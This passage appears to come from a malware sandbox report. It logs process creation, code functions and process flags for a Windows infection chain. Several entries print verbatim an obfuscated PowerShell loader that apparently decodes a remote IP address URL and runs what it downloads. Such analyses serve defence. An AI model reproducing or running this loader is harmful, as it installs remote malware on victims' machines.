ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1F54D7 push ebp; iretd 2_2_00007FFB4B1F5538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07611FC8 push eax; mov dword ptr [esp], ecx5_2_076121B4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE2806 push ecx; ret 10_2_20DE2819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
